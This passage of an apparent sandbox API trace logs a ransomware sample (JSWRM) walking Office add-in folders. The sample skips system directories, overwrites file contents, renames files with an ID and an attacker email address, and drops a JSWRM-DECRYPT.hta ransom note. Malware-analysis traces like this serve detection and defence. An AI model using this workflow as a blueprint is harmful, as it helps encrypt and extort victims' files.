cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0123.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0123.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0123.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0123.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.718] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133cde53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50101, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.cs.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2=".") returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="..") returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="...") returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="windows") returned -1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="recovery") returned -1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="perflogs") returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="documents and settings") returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="system volume information") returned -1 [0123.718] lstrcmpiW (lpString1="PowerViewRes.cs.xap", lpString2="msocache") returned 1 [0123.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.cs.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.cs.xap", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.cs.xap", lpUsedDefaultChar=0x0) returned 19 [0123.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.cs.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.cs.xap", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.cs.xap", lpUsedDefaultChar=0x0) returned 19 [0123.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0123.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0123.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\PowerViewRes.cs.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\powerviewres.cs.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.719] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=327937) returned 1 [0123.719] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.719] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.733] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.734] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.734] CloseHandle (hObject=0x338) returned 1 [0123.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0123.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0123.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.735] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\PowerViewRes.cs.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\powerviewres.cs.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\PowerViewRes.cs.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\powerviewres.cs.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0123.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.736] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133cde53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50101, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.cs.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.736] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0123.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0123.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0123.737] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0123.737] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0123.737] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0123.737] lstrcmpiW (lpString1="da", lpString2="...") returned 1 [0123.737] lstrcmpiW (lpString1="da", lpString2="windows") returned -1 [0123.737] lstrcmpiW (lpString1="da", lpString2="recovery") returned -1 [0123.737] lstrcmpiW (lpString1="da", lpString2="perflogs") returned -1 [0123.737] lstrcmpiW (lpString1="da", lpString2="documents and settings") returned -1 [0123.737] lstrcmpiW (lpString1="da", lpString2="$RECYCLE.BIN") returned 1 [0123.737] lstrcmpiW (lpString1="da", lpString2="system volume information") returned -1 [0123.737] lstrcmpiW (lpString1="da", lpString2="msocache") returned -1 [0123.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0123.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0123.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0123.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0123.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0123.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0123.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\jswrm-decrypt.hta")) returned 0xffffffff [0123.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0123.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0123.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0123.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.743] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.743] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.744] CloseHandle (hObject=0x314) returned 1 [0123.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0123.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0123.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0123.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0123.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0123.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0123.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0123.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\jswrm-decrypt.hta")) returned 0x20 [0123.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0123.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0123.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0123.744] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x406a8c71, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0123.744] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.744] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x406a8c71, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.745] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.745] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.745] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a6473, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4258, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.745] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f70, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2413a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0123.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.745] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x406a8c71, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x406a8c71, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x406a8c71, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.745] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.745] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.745] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.745] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.746] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.746] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.746] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.746] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.746] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.746] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0123.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, 